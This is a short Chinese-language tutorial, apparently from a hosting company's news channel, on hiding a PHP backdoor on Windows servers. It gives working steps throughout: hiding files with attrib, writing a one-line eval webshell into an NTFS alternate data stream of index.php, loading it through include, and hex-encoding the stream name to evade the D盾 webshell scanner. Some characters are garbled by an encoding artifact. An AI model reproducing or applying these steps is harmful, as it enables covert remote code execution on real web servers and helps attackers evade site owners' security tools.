如何將php后門隱藏

如何將php后門隱藏？很多新手對此不是很清楚，為了幫助大家解決這個難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來學(xué)習(xí)下，希望你能有所收獲。

php將后門隱藏的方法：首先創(chuàng)建系統(tǒng)隱藏文件，并創(chuàng)建ADS隱藏文件；然后通過包含文件的方式來使用jpd；最后將【index.php:shell.jpg】hex編碼即可。

php將后門隱藏的方法：

一. attrib +s +h

創(chuàng)建系統(tǒng)隱藏文件。

attrib +s +a +r +h  /  attrib +s +h文件名

查看隱藏文件

二. 利用ADS隱藏文件

　　NTFS交換數(shù)據(jù)流（Alternate　Data　Streams，簡稱ADS）是NTFS磁盤格式的一個特性，在NTFS文件系統(tǒng)下，每個文件都可以存在多個數(shù)據(jù)流。通俗的理解，就是其它文件可以“寄宿”在某個文件身上，而在資源管理器中卻只能看到宿主文件，找不到寄宿文件。利用ADS數(shù)據(jù)流，我們可以做很多有趣的事情。(抄的)

1.首先創(chuàng)建ADS隱藏文件

在命令行，echo一個數(shù)據(jù)流進(jìn)去，比如index文件是正常文件。

echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg

這樣就生成了一個不可見的 index.php:shell.jpg

可用 dir/r命令來查看

修改與刪除

修改:

進(jìn)入文件所在目錄，notepad index.php:shell.jpg

如何刪除index.php:shell.jpg呢？

直接刪除index.php

2. 文件包含

我們生成了index.php:shell.jpg，可以通過包含文件的方式來使用。

<?php include(‘index.php:shell.jpg‘)?>

技術(shù)分享圖片

還可以用上面學(xué)的隱藏include.php

3. 免殺

隱藏了也不行兄dei，D盾一掃瞬間爆炸。

把index.php:shell.jpg  hex編碼

<?php 
$a="696E6465782E7068703A7368656C6C2E6A7067";
 // index.php:shell.jpg hex編碼
$b="a";
include(PACK(‘H*‘,$$b))
?>

看完上述內(nèi)容是否對您有幫助呢？如果還想對相關(guān)知識有進(jìn)一步的了解或閱讀更多相關(guān)文章，請關(guān)注億速云行業(yè)資訊頻道，感謝您對億速云的支持。